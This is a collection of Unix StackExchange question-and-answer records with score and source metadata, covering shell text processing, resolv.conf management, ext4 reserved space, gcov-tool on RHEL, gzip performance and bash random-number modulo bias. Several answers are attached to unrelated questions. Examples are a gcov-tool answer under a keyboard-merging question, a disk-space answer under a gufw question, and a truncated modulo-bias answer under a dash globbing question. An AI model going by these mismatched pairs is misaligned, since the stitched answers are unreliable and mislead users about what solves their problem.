the full set of numbers; we then substitute those numbers into the appropriate place in the paired filenames. In the second way, you don't know or care how many files there are: for first in tcr*_r1.txtdo command "$first" "${first/_r1.txt/_r2.txt}"done Above, we loop over all of the "r1" files and substitute the "_r1.txt" part for the paired "_r2.txt". | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/527493",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/302096/"
]
} |
527,521 | Example: I have the file "mybinaryfile", and the contents in hex are: A0 01 00 FF 77 01 77 01 A0 I need to know how many A0 bytes there are in this file, how many 01, and so on. The result could be: A0: 201: 300: 1FF: 177: 2 Is there some way to make this count directly in shell or do I need to write a program in whatever language to do this specific task? | This uses od to show one hex value per line, then sorts and counts: od -t x1 -w1 -v -An mybinaryfile | sort | uniq -c ( -w1 is an extension, it’s not mandated by POSIX .) | {
"score": 5,
"source": [
"https://unix.stackexchange.com/questions/527521",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/273356/"
]
} |
527,555 | I'm trying to add a search line to /etc/resolv.conf I've added it directly, as an append command in /etc/dhcp/dhclient.conf and as a nameservers block in /etc/netplan/50-cloud-init.yaml . After roughly an hour, the dhcp and netplan files are intact, but resolv.conf has reverted to not having my search. I haven't changed /etc/network/interfaces because it says "ifupdown has been replaced by netplan(5) on this system." Any thoughts on what might be overwriting /etc/resolv.conf besides those two things? This is ubuntu 18.04 on EC2. | There is a complex competition to get control of the resolv.conf file, it is a very old competition. Contenders that try to write a resolv.conf are resolvconf , dhcp , interfaces , network manager and recently systemd-resolved . Other programs also may use resolv.conf , like dnsmasq . Thus, a simple solution doesn't work in all cases. If you have the resolvconf program installed (whose main goal is to take ownership of the resolv.conf file) then: un-install it. If your system uses DHCP to get a working IP (most probably you do), every hour or so (depending on system configuration) the IP gets renewed, that re-writes resolv.conf . Detect if this is the source of the problem. The file /etc/interfaces may be used to change the resolv.conf configuration. Find out if it is (and erase it). Network Manager could be configured to change what resolv.conf does. Detect (and erase) if it is doing so. Systemd-resolved may be configured to take control of resolv.conf via a sym-link. Remove the link if it exists. Some recommend to make resolv.conf not modifiable (I believe that is more a problem than a solution). Remove it if it exists. After you have removed all the above: decide who should keep control of the resolv.conf file understanding that DHCP could update the file when a new DHCP lease is obtained. If the ISP (or upstream dhcp server owner) dns server is the one that should be used. DHCP leases could be configured to change the IP but not update the resolv.conf file, or an alternate dnsmasq/resolv.conf could be used if a local (127.0.0.1) DNS server (well, mostly like a catching server) is setup with dnsmasq . Of course, more complex configurations could be built with bind9 , Unbound , NSD and many others. Ask for more help if needed. Related: How to stop dhclient from updating resolvconf on Debian? How do I stop Debian from overwriting /etc/resolv.conf and overwriting my VPN's nameservers? resolv.conf overwritten every time What overwrites /etc/resolv.conf on every boot? What causing resolv.conf overwritten ? CentOS 7 NetworkManager Keeps Overwriting /etc/resolv.conf How do I include lines in resolv.conf that won't get lost on reboot? Arch linux OpenResolv . | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/527555",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/47282/"
]
} |
527,571 | I have a folder x with a number of sufolders ale, bae, galo and inside each subfolder one .pest file. x/ale/ale.pest x/bae/bae.pest x/galo/galo.pest I have a list in folder y containing the order I should cat .pest files baegaloale from my x folder I'm trying for file in ./*/*.pest; do while read line; do cat "$line".pest; done; done <./y/list but it's not working. | To answer the follow-up subtly different question: I'm still wondering how would be if my subdirectories didn't have same names as in list though.... Let's make some assumptions: All the subdirectories of x are fair game. All .pest files are fair game. If you have two .pest files with the same name (but in different directories), you don't care what order those two files will be cat ed in. Then you have: while read -r name; do cat x/*/"$name.pest"done <y/list >concatenated.pest Adding sanity checking is a little bit trickier but still doable. (I'm not doing that part as I don't know if my assumptions even match your use case.) | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/527571",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/193440/"
]
} |
527,628 | Linux Mint tells me, I only have 622 MB free disk space but there should be some gigabytes left. Looking at the partitions I am told that there are about ten gigabytes unused. I googled the problem and didn't find a solution but I did find the hint that I should check the disk usage with df -h . sudo df -h /homeFilesystem Size Used Avail Use% Mounted on/dev/nvme0n1p8 189G 178G 622M 100% /home The output doesn't make any sense to me: The difference between Size and Used is 11GB, but it only shows 622M as Available. The SSD isn't old, so I wouldn't expect such a discrepancy. What should I do? | If the filesystem is ext4, there are reserved blocks, mostly to help handling and help avoid fragmentation and available only to the root user. For this setting, it can be changed live using tune2fs (not all settings can be handled like this when the filesystem is mounted): -m reserved-blocks-percentage Set the percentage of the filesystem which may only be allocated by privileged processes. Reserving some number of filesystem blocks for use by privileged processes is done to avoid filesystem fragmentation, and to allow system daemons, such as syslogd(8), to continue to function correctly after non-privileged processes are prevented from writing to the filesystem. Normally, the default percentage of reserved blocks is 5%. So if you want to lower the reservation to 1% (~ 2GB) thus getting access to ~ 8GB of no more reserved space, you can do this: sudo tune2fs -m 1 /dev/nvme0n1p8 Note: the -m option actually accepts a decimal number as parameter. You can use -m 0.1 to reserve only about ~200MB (and access most of those previously unavailable 10GB). You can also use the -r option instead to reserve directly by blocks. It's probably not advised to have 0 reserved blocks. | {
"score": 6,
"source": [
"https://unix.stackexchange.com/questions/527628",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/327870/"
]
} |
527,721 | I thought that gcov-tool is part of gcc standard package, which is true for Ubuntu. But unfortunately it's not true for RHEL. I didn't succeed to find RHEL package name to install gcov-tool. Does anybody know it? What should I write in my terminal to get gcov-tool installed (with exactly same version, as gcc & other dev-tools)? I've tried to install all Development Tools ( yum group install "Development Tools" ), it installed successfully, but gcov-tool wasn't installed. There is next list of RHEL versions where I need gcov-tool:rhel6.6-x86_64rhel6.7-x86_64rhel6.8-x86_64rhel6.9-x86_64rhel7.0-x86_64rhel7.1-x86_64rhel7.2-x86_64rhel7.3-x86_64rhel7.3-x86_64rhel7.4-x86_64 rhel7.5-x86_64rhel7.6-x86_64 | You need to install one of the devtoolset packages via yum . I recommend devtoolset-8 as it's the latest and it's what you'll have in Ubuntu. devtoolset-6 and devtoolset-7 also have it if you prefer one of those. First, make sure that the rhel-server-rhscl-7-rpms repos is enabled. You can just enable them all: subscription-manager repos --enable rhel* After that, install devtoolset-8 : yum install devtoolset-8* Then, add the gcc from devtoolset to your environment: scl enable devtoolset-8 bash You can then see gcov-tool available: which gcov-tool It will be located in /opt/rh/devtoolset-8/root/usr/bin . Another way to get gcov-tool is to build gcc from source but that's far more complicated | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/527721",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/222193/"
]
} |
527,724 | I use two keypads ( Koolertron AE-SMKD72 Type A ), that I use as one split keyboard. But they are recognized as two separate keyboards, what causes some problems: I use an alternative keyboard layout but have a program running that maps keys back to QWERTZ when I press Ctrl because I don't want to relearn shortcuts as Ctrl-c . This program doesn't work when I press Ctrl on the left and u on the right keyboard. There is a bug in Gnome that causes the screen to freeze when typing quickly on two different keyboards. There is only one keyboard listed in /dev/input/by-id (probably because they are named identically). That's why I would prefer if Linux would consider both keyboards halves as a single keyboard. Is it possible to merge two keyboards into a single input device?Or alternatively, is it possible to merge to USB ports into one in a way that the two devices appear to be only one? | You need to install one of the devtoolset packages via yum . I recommend devtoolset-8 as it's the latest and it's what you'll have in Ubuntu. devtoolset-6 and devtoolset-7 also have it if you prefer one of those. First, make sure that the rhel-server-rhscl-7-rpms repos is enabled. You can just enable them all: subscription-manager repos --enable rhel* After that, install devtoolset-8 : yum install devtoolset-8* Then, add the gcc from devtoolset to your environment: scl enable devtoolset-8 bash You can then see gcov-tool available: which gcov-tool It will be located in /opt/rh/devtoolset-8/root/usr/bin . Another way to get gcov-tool is to build gcc from source but that's far more complicated | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/527724",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/305474/"
]
} |
527,731 | I would like to have the following output r 1r 2r 3...r 100 I have tried so far printf "%s\n" "r {1..100..1}" | r may be a part of the format: printf 'r %s\n' {1..100} | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/527731",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/298739/"
]
} |
527,813 | Need expert suggestions on below comparison: Code Segment using loop: for file in `cat large_file_list`do gzip -d $filedone Code segment using simple expansion: gzip -d `cat large_file_list` Which one will be faster? Have to manipulate large data set. | Complications The following will work only sometimes: gzip -d `cat large_file_list` Three problems are (in bash and most other Bourne-like shells): It will fail if any file name has space tab or newline characters in it (assuming $IFS has not been modified). This is because of the shell's word splitting . It is also liable to fail if any file name has glob-active characters in it. This is because the shell will apply pathname expansion to the file list. It will also fail if filenames starts with - (if POSIXLY_CORRECT=1 that only applies to the first file) or if any filename is - . It will also fail if there are too many file names in it to fit on one command line. The code below is subject to the same problems as the code above (except for the fourth) for file in `cat large_file_list`do gzip -d $filedone Reliable solution If your large_file_list has exactly one file name per line, and a file called - is not among them, and you're on a GNU system, then use: xargs -rd'\n' gzip -d -- <large_file_list -d'\n' tells xargs to treat each line of input as a separate file name. -r tells xargs not to run the command if the input file is empty. -- tells gzip that the following arguments are not to be treated as options even if they start with - . - alone would still be treated as - instead of the file called - though. xargs will put many file names on each command line but not so many that it exceeds the command line limit. This reduces the number of times that a gzip process must be started and therefore makes this fast. It is also safe: the file names will also be protected from word splitting and pathname expansion . | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/527813",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/148046/"
]
} |
527,870 | I am new to these commands. I am trying to gzip a local folder and unzip the same on the remote server. The thing is, gzipping and unzip must happen on the fly. I tried many and one of the closest I believe is this: tar cf dist.tar ~/Documents/projects/myproject/dist/ | ssh [email protected]:~/public_html/ "tar zx ~/Documents/projects/myproject/dist.tar" As you can see above, I am trying to send out the dist folder to the remote server, but before that I am trying to compress the folder on the fly ( looks like that is not happening in above command ). local folder: ~/Documents/projects/myproject/dist/ remote folder: ~/public_html ( directly deploying to live ) Of course, the gzip created file must not be there, it should happen on the fly. My intention is to run the above like through a file like sh file.command . In other words, I am trying to deploy my compiled project which is in dist folder, to live when the sh command is executed. I don't want to do this manually every time I make a change in my project. | If you have rsync then use that instead, as it makes use of existing files to allow it to transfer only differences (that is, parts of files that are different): rsync -az ~/Documents/projects/myproject/dist/ [email protected]:public_html/ Add the --delete flag to to completely overwrite the target directory tree each time. If you want to see what's going on, add -v . If you don't have rsync , then this less efficient solution using tar will suffice: ( cd ~/Documents/projects/myproject/dist && tar czf - . ) | ssh [email protected] 'cd public_html && tar xzf -' Notice that the writing and reading of the compressed tarball is via stdout and stdin (the - filename). If you were using GNU tar you could use the -C to set a correct directory before processing, whereas here we've used old-fashioned (traditional?) cd . Add the v flag (on the receiving side) to see what's going on, i.e. tar xzvf ... . | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/527870",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/64665/"
]
} |
527,983 | What happens if the limit of 4 billion files was exceeded in an ext4 partition, with a transfer of 5 billion files for example? | Presumably, you'll be seeing some flavor of "No space left on device" error: # truncate -s 100M foobar.img# mkfs.ext4 foobar.imgCreating filesystem with 102400 1k blocks and 25688 inodes---> number of inodes determined at mkfs time ^^^^^# mount -o loop foobar.img loop/# touch loop/{1..25688}touch: cannot touch 'loop/25678': No space left on devicetouch: cannot touch 'loop/25679': No space left on devicetouch: cannot touch 'loop/25680': No space left on device And in practice you hit this limit a lot sooner than "4 billion files". Check your filesystems with both df -h and df -i to find out how much space there is left. # df -h loop/Filesystem Size Used Avail Use% Mounted on/dev/loop0 93M 2.1M 84M 3% /dev/shm/loop# df -i loop/Filesystem Inodes IUsed IFree IUse% Mounted on/dev/loop0 25688 25688 0 100% /dev/shm/loop In this example, if your files are not 4K size on the average, you run out of inode-space much sooner than storage-space. It's possible to specify another ratio ( mke2fs -N number-of-inodes or -i bytes-per-inode or -T usage-type as defined in /etc/mke2fs.conf ). | {
"score": 7,
"source": [
"https://unix.stackexchange.com/questions/527983",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/359833/"
]
} |
527,997 | I want to install gufw on my Fedora, but I do not know how to do that.I tried to install with the dnf package manager command but it doesn't work and gets this output: No match for argument: gufwError: Unable to find a match So, I did an apt-get and again I got negative result: E: Couldn't find package gufw How can I successfully install gufw? I want to control each app's access to the internet, so is there any firewall app other than gufw ? | Presumably, you'll be seeing some flavor of "No space left on device" error: # truncate -s 100M foobar.img# mkfs.ext4 foobar.imgCreating filesystem with 102400 1k blocks and 25688 inodes---> number of inodes determined at mkfs time ^^^^^# mount -o loop foobar.img loop/# touch loop/{1..25688}touch: cannot touch 'loop/25678': No space left on devicetouch: cannot touch 'loop/25679': No space left on devicetouch: cannot touch 'loop/25680': No space left on device And in practice you hit this limit a lot sooner than "4 billion files". Check your filesystems with both df -h and df -i to find out how much space there is left. # df -h loop/Filesystem Size Used Avail Use% Mounted on/dev/loop0 93M 2.1M 84M 3% /dev/shm/loop# df -i loop/Filesystem Inodes IUsed IFree IUse% Mounted on/dev/loop0 25688 25688 0 100% /dev/shm/loop In this example, if your files are not 4K size on the average, you run out of inode-space much sooner than storage-space. It's possible to specify another ratio ( mke2fs -N number-of-inodes or -i bytes-per-inode or -T usage-type as defined in /etc/mke2fs.conf ). | {
"score": 7,
"source": [
"https://unix.stackexchange.com/questions/527997",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/359491/"
]
} |
528,009 | I have a job script which is not producing results, and one of my suspicions is that there are some files called which are missing, the relevant part of the job scripts looks like this: echo get_data get_fms_data \ amip1 \ seaesf \ albedo \ lad \ topog \ ggrpsst \ mom4 \ /data0/home/rslat/GFDL/archive/edg/fms/river_routes_gt74Sto61S=river_destination_field \ /data0/home/rslat/GFDL/archive/fms/mom4/mom4p1/mom4p1a/mom4_ecosystem/preprocessing/rho0_profile.nc \ /data0/home/rslat/GFDL/archive/fms/mom4/mom4p0/mom4p0c/mom4_test8/preprocessing/fe_dep_ginoux_gregg_om3_bc.nc=Soluble_Fe_Flux_PI.nc \ /data0/home/rslat/GFDL/archive/jwd/regression_data/esm2.1/input/cover_type_1860_g_ens=cover_type_field \ /data0/home/rslat/GFDL/archive/jwd/regression_data/esm2.1/input/soil_color.nc \ /data0/home/rslat/GFDL/archive/jwd/regression_data/esm2.1/input/biodata.nc \ /data0/home/rslat/GFDL/archive/jwd/regression_data/esm2.1/input/ground_type.nc \ /data0/home/rslat/GFDL/archive/jwd/regression_data/esm2.1/input/groundwater_residence.nc \ /data0/home/rslat/GFDL/archive/ms2/esm2.1/input/max_water.nc \... As a first step, I want to copy all these paths into a text file and then check if they actually exist. Is there an easy way to do it? I looked in other questions but most of them refer to checking only one file and not from a file. Thank you! | Presumably, you'll be seeing some flavor of "No space left on device" error: # truncate -s 100M foobar.img# mkfs.ext4 foobar.imgCreating filesystem with 102400 1k blocks and 25688 inodes---> number of inodes determined at mkfs time ^^^^^# mount -o loop foobar.img loop/# touch loop/{1..25688}touch: cannot touch 'loop/25678': No space left on devicetouch: cannot touch 'loop/25679': No space left on devicetouch: cannot touch 'loop/25680': No space left on device And in practice you hit this limit a lot sooner than "4 billion files". Check your filesystems with both df -h and df -i to find out how much space there is left. # df -h loop/Filesystem Size Used Avail Use% Mounted on/dev/loop0 93M 2.1M 84M 3% /dev/shm/loop# df -i loop/Filesystem Inodes IUsed IFree IUse% Mounted on/dev/loop0 25688 25688 0 100% /dev/shm/loop In this example, if your files are not 4K size on the average, you run out of inode-space much sooner than storage-space. It's possible to specify another ratio ( mke2fs -N number-of-inodes or -i bytes-per-inode or -T usage-type as defined in /etc/mke2fs.conf ). | {
"score": 7,
"source": [
"https://unix.stackexchange.com/questions/528009",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/356086/"
]
} |
528,023 | Suppose I have a file like this. Keyword "name"aaa bbbccc dddKeyword "another name"eee fffggghhh iii and so on. I want to change the keyword lines in the file to have counters starting from a given number. For example if I want to number the keyword lines starting from 5 the keyword lines would look like Keyword "5 - name"Keyword "6 - another name" and so on. All the other lines in the file are not changed. Is there a way to do this thanks. | If you have GNU sed, you could use the non-standard R command to read and insert indices from a pre-generated sequence, with a second invocation of sed to rearrange the result: printf '%d\n' {5..100} | sed '/^Keyword/R /dev/stdin' file | sed '/^Keyword/{N; s/Keyword "\([^"]*\)"\n\(.*\)/Keyword "\2 - \1"/}' However I would suggest using perl or awk for this task instead - for example awk -v k=5 '/^Keyword/ {sub(/^Keyword \"/, sprintf("Keyword \"%d - ", k++))} 1' file | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/528023",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/276876/"
]
} |
528,066 | I need to sort and rename files in a test directory such that based on the bolded number the file will be renamed 1-5 in groups of 5. I was able to sort them but now need to rename them 1,2,3,4, or 5. This is what I have so far: find . -maxdepth 1 -type f -name '*.txt' | sort -nt_ -k2,2 -k7,7./FoilHole_6862563_Data_6834945_6834947_20190608_255634_Image.txt./FoilHole_6862563_Data_6834952_6834954_20190608_255710_Image.txt./FoilHole_6862563_Data_6834959_6834961_20190608_255748_Image.txt./FoilHole_6862563_Data_6834935_6834937_20190608_255827_Image.txt./FoilHole_6862563_Data_6834967_6834969_20190608_255906_Image.txt./FoilHole_6862568_Data_6834945_6834947_20190608_060123_Image.txt./FoilHole_6862568_Data_6834952_6834954_20190608_060159_Image.txt./FoilHole_6862568_Data_6834959_6834961_20190608_360237_Image.txt./FoilHole_6862568_Data_6834935_6834937_20190608_460316_Image.txt./FoilHole_6862568_Data_6834967_6834969_20190608_560354_Image.txt What I now need to do is rename them as: ./FoilHole_6862563_Data_6834945_6834947_20190608_1_Image.txt./FoilHole_6862563_Data_6834952_6834954_20190608_2_Image.txt./FoilHole_6862563_Data_6834959_6834961_20190608_3_Image.txt./FoilHole_6862563_Data_6834935_6834937_20190608_4_Image.txt./FoilHole_6862563_Data_6834967_6834969_20190608_5_Image.txt./FoilHole_6862568_Data_6834945_6834947_20190608_1_Image.txt./FoilHole_6862568_Data_6834952_6834954_20190608_2_Image.txt./FoilHole_6862568_Data_6834959_6834961_20190608_3_Image.txt./FoilHole_6862568_Data_6834935_6834937_20190608_4_Image.txt./FoilHole_6862568_Data_6834967_6834969_20190608_5_Image.txt | If you have GNU sed, you could use the non-standard R command to read and insert indices from a pre-generated sequence, with a second invocation of sed to rearrange the result: printf '%d\n' {5..100} | sed '/^Keyword/R /dev/stdin' file | sed '/^Keyword/{N; s/Keyword "\([^"]*\)"\n\(.*\)/Keyword "\2 - \1"/}' However I would suggest using perl or awk for this task instead - for example awk -v k=5 '/^Keyword/ {sub(/^Keyword \"/, sprintf("Keyword \"%d - ", k++))} 1' file | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/528066",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/360513/"
]
} |
528,094 | I'm using an production server for loading large data set to Hadoop to access from Hive table. We are loading subscribers web browsing data of Telecom Sector. We've large number of .csv.gz file (File sizes around 300-500MB) which is compressed using gzip . Suppose a file is as below: Filename: dna_file_01_21090702.csv.gz Contents: A,B,C,2 D,E,F,3 We unzip 50 or so files and concatenate to one file. For troubleshooting purposes, we append the file name as first column of every row. So concatenet data file would be: dna_file_01_21090702.csv.gz,A,B,C,2 dna_file_01_21090702.csv.gz,D,E,F,33 For that purposed written below bash script: #!/bin/bashfunc_gen_new_file_list(){ > ${raw_file_list} ls -U raw_directory| head -50 >> ${raw_file_list}}func_create_dat_file(){ cd raw_directory gzip -d `cat ${raw_file_list}` awk '{printf "%s|%s\n",FILENAME,$0}' `cat ${raw_file_list}|awk -F".gz" '{print $1}'` >> ${data_file}}func_check_dir_n_load_data(){ ## Code to copy data file to HDFS file system }##___________________________ Main Function _____________________________ ##__Variable data_load_log_dir=directory raw_file_list=${data_load_log_dir}/raw_file_list_name data_file_name=dna_data_file_`date "+%Y%m%d%H%M%S"`.dat data_file=${data_load_log_dir}/${data_file_name} ##__Function Calls func_gen_new_file_list func_create_dat_file func_check_dir_n_load_data Now the problem is gzip -d command performing extremely slow. I mean really really slow. If it unzip 50 files and make the concatenated data file the size would be around 20-25GB. To unzip 50 files and concatenate it to one takes almost 1 hour which is huge. In this rate, its impossible to process all the data generated in a single day. My production server(VM) is pretty powerful. Total core is 44 and RAM is 256GB. Also HARD Disk is very good and high performing. IOwait is around 0-5. How can I faster this process? What is the alternatives of gzip -d . Is there any other way to make the concatenated data file more efficiently. Please note that we need to keep the file name in records for trouble shooting purpose. Otherwise we could have just use zcat and append to a data file without unzipping at all. | There is a lot of disk I/O that could be replaced by pipes. The func_create_dat_file takes a list of 50 compressed files, reads each of them and writes the uncompressed data. It then reads each of the 50 uncompressed data files, and writes it out again with the filename prepended. All of this work is done sequentially so can not take any advantage of your multiple cpus. I suggest you try func_create_dat_file(){ cd raw_directory while IFS="" read -r f do zcat -- "$f" | sed "s/^/${f%.gz}|/" done < "${raw_file_list}" >> "${data_file}"} Here the compressed data is read once from disk. The uncompressed data is written once to a pipe, read once from the pipe and then written once to the disk. The transformation of the data happens in parallel with the reading and so can use 2 cpus. [Edit] A comment asked to explain the sed "s/^/${f%.gz}|/" part. This is the code to put the filename as a new field at the start of each line. $f is the filename. ${f%.gz} removes .gz from the end of the string. There is nothing special about the | in this context, so ${f%.gz}| is the filename with a trailing .gz removed followed by a | . In sed s/old/new/ is the substitute (replace) command, it takes a regular expression for the old part. ^ as a regular expression matches the start of line, so putting this together it say change the beginning of line to be the filename without a trailing .gz and a | . The | was added to match the OP's program rather than the OP's description. If it really was a CSV (comma separated variable) file, then this should be a comma rather than a vertical bar. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/528094",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/148046/"
]
} |
528,213 | The command tail -f command is great for tracing, and in terminal it's very helpful to be able to, for example, hit enter, and type a comment like -- after xyz change... -- For record purposes, I would like to be able to pipe the tail output to terminal, plus my annotations, to a second file. Is this possible (other than copying and pasting the output manually)? Thanks! | This does what you need: sh -c 'tail -f file & cat' | tee file2 Note, it duplicates your comments for the terminal output when you press enter. It works also with {...} and (...) instead of sh -c , but then tail -f won't stop running when you press ctrl + c . | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/528213",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/104388/"
]
} |
528,302 | I'm a novice data hoarder, and have a few hundred videos archived from YouTube, using the following youtube-dl config file: -i-o "%(uploader)s (%(uploader_id)s)/%(upload_date)s - %(title)s - (%(duration)ss) [%(resolution)s] [%(id)s].%(ext)s"# Archive Settings--download-archive youtube-dl-archive.txt-a youtube-dl-channels.txt# Uniform Format--prefer-ffmpeg--merge-output-format mkv# Get All Subs to SRT--write-sub--all-subs--convert-subs srt# Get metadata--add-metadata--write-description--write-thumbnail# Debug-v I just recently realized that I should really be including the --write-info-json option. How can I go back through and download just the info-json files for all the videos without re-downloading the videos themselves? I've been using the -a option to keep track of what videos I've already archived, and thus I can easily use that file as a list of all the videos I need to download the info-json file for. But I still don't know how to download just the info-json. Thanks for any pointers here. | Not a fully fledged answer, but as I am new and cannot add a comment, I have to use this Have you tried the -j, --dump-json option, or one of the other ones listed in the manual at https://github.com/ytdl-org/youtube-dl/blob/master/README.md#verbosity--simulation-options ? I just tried it and it seemed to work fine on a single video | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/528302",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/360743/"
]
} |
528,307 | I'm using wpa_supplicant to connect to my wifi network. Since I'm using dwm , I want to show the SSID of the connected network in the panel. Is there a way to get the SSID of the connected network in wpa_supplicant ? | You can do this using iwgetid from the wireless_tools package: pacman -S wireless_tools Then run iwgetid -r | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/528307",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/166017/"
]
} |
528,323 | According to this document : The environment variable TERM contains a identifier for the text window’s capabilities. You can get a detailed list of these cababilities by using the ‘infocmp’ command, using ‘man 5 terminfo’ as a reference. But how is the TERM variable actually used? Say, the system runs xterm (terminal emulator for the X Window System). Does xterm use the TERM variable, or is it the shell? If so, how? Would xterm stop working, if TERM is set to linux ? Also, why isn't colored output disabled if I change TERM from its default value of xterm-256color to something else like xterm ? | The TERM variable is used by programs running in a terminal. It is supposed to allow programs to determine the capabilities of the terminal (or emulator) which is handling their output. It is documented in the ncurses manpage . The terminal itself, including emulators such as xterm , doesn’t care about the value of TERM , beyond setting it (in the case of emulators — physical terminals can’t). It knows how to handle certain output sequences, and it handles them, without caring about TERM or anything else apart from its internal state. You can set TERM to anything you like in your shell, or even unset it, without changing the terminal’s behaviour; for a start, the terminal doesn’t know what TERM is set to! Programs which care about TERM are typically those which use an output library which cares, such as ncurses , or in a more basic form Termcap or Terminfo . This includes shells such as Bash and Zsh, which use terminfo, for example for line editing features (being able to erase the line when you move up and down the history). These map the value of TERM to a database of capabilities, which tell the program or library whether the terminal can perform certain tasks (such as moving the cursor, clearing the screen, changing colours) and how to go about it. Some programs, such as GNU grep , assume capabilities without even checking. Changing TERM from xterm-256color to xterm won’t change much, in particular it won’t disable colour support in programs which refer to TERM : xterm supports colour output too. The difference is in the number of colours which are supported. See How do keyboard input and text output work? , Colors in Man Pages , Which terminal type am I using? , What protocol/standard is used by terminals? for more detail. | {
"score": 5,
"source": [
"https://unix.stackexchange.com/questions/528323",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/128739/"
]
} |
528,343 | I read about RNGs on Wikipedia and $RANDOM function on TLDP but it doesn't really explain this result: $ max=$((6*3600))$ for f in {1..100000}; do echo $(($RANDOM%max/3600)); done | sort | uniq -c 21787 0 22114 1 21933 2 12157 3 10938 4 11071 5 Why are the values above about 2x more inclined to be 0, 1, 2 than 3, 4, 5 but when I change the max modulo they're almost equally spread over all 10 values? $ max=$((9*3600))$ for f in {1..100000}; do echo $(($RANDOM%max/3600)); done | sort | uniq -c 11940 0 11199 1 10898 2 10945 3 11239 4 10928 5 10875 6 10759 7 11217 8 | To expand on the topic of modulo bias, your formula is: max=$((6*3600))$(($RANDOM%max/3600)) And in this formula, $RANDOM is a random value in the range 0-32767. RANDOM Each time this parameter is referenced, a random integer between 0 and 32767 is generated. It helps to visualize how this maps to possible values: 0 = 0-35991 = 3600-71992 = 7200-107993 = 10800-143994 = 14400-179995 = 18000-215990 = 21600-251991 = 25200-287992 = 28800-323993 = 32400-32767 So in your formula, the probability for 0, 1, 2 is twice that of 4, 5. And probability of 3 is slightly higher than 4, 5 too. Hence your result with 0, 1, 2 as winners and 4, 5 as losers. When changing to 9*3600 , it turns out as: 0 = 0-35991 = 3600-71992 = 7200-107993 = 10800-143994 = 14400-179995 = 18000-215996 = 21600-251997 = 25200-287998 = 28800-323990 = 32400-32767 1-8 have the same probability, but there is still a slight bias for 0, and hence 0 was still the winner in your test with 100'000 iterations. To fix the modulo bias, you should first simplify the formula (if you only want 0-5 then the modulo is 6, not 3600 or even crazier number, no sense in that). This simplification alone will reduce your bias by a lot (32766 maps to 0, 32767 to 1 giving a tiny bias to those two numbers). To get rid of bias altogether, you need to re-roll, (for example) when $RANDOM is lower than 32768 % 6 (eliminate the states that do not map perfectly to available random range). max=6for f in {1..100000}do r=$RANDOM while [ $r -lt $((32768 % $max)) ]; do r=$RANDOM; done echo $(($r%max))done | sort | uniq -c | sort -n Test result: 16425 5 16515 1 16720 0 16769 2 16776 4 16795 3 The alternative would be using a different random source that does not have noticable bias (orders of magnitude larger than just 32768 possible values). But implementing a re-roll logic anyway doesn't hurt (even if it likely never comes to pass). | {
"score": 6,
"source": [
"https://unix.stackexchange.com/questions/528343",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/82399/"
]
} |
528,361 | I'm working with a copy of Raspbian, installed with pi-gen . Pi-gen runs in a Docker container with a volume for the filesystem, running debootstrap and custom scripts inside a chroot to the volume. I'm running a shell inside the Raspbian filesystem using chroot and qemu-arm-static , but without Docker. I noticed that the mkinitramfs script was not working. I traced the problem back to dash , which the script is running in. For some reason dash is not expanding filename wildcards in commands: # echo /*/*# ls /bin boot dev etc home lib media mnt opt proc root run sbin sys tmp usr var This happens in all folders inside the chroot and also in scripts . This breaks a lot of stuff. However, wildcard expansion works normally in filesystems bind-mounted inside the chroot , such as /proc and /run . Also, path expansion using the same dash binary works inside a different chroot . I've already tried set +f and set +o noglob with no luck. The noglob option is definitely not on: # set -oCurrent option settingserrexit offnoglob offignoreeof offinteractive onmonitor onnoexec offstdin onxtrace offverbose offvi offemacs offnoclobber offallexport offnotify offnounset offnolog offdebug off I'm running version 0.5.8-2.4 of the dash package from http://raspbian.raspberrypi.org/raspbian stretch/main armhf . The host machine is running Kali Linux 2019.1 with kernel 4.19.0-kali4-amd64 . Has anyone seen a similar problem before? What could I use as a workaround? Update: The following is the relevant part of the strace dump in a working chroot : read(0, "echo /*\n", 8192) = 8openat(AT_FDCWD, "/", O_RDONLY|O_NONBLOCK|O_CLOEXEC|O_DIRECTORY) = 3fstat(3, {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0getdents(3, /* 11 entries */, 32768) = 264getdents(3, /* 0 entries */, 32768) = 0close(3) = 0write(1, "/bin /dev /etc /lib /pls /proc /"..., 46) = 46 The same in the non-working chroot : read(0, "echo /*\n", 8192) = 8openat(AT_FDCWD, "/", O_RDONLY|O_NONBLOCK|O_CLOEXEC|O_DIRECTORY) = 3fstat(3, {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0getdents64(3, /* 20 entries */, 32768) = 488close(3) = 0write(1, "/*\n", 3) = 3 | To expand on the topic of modulo bias, your formula is: 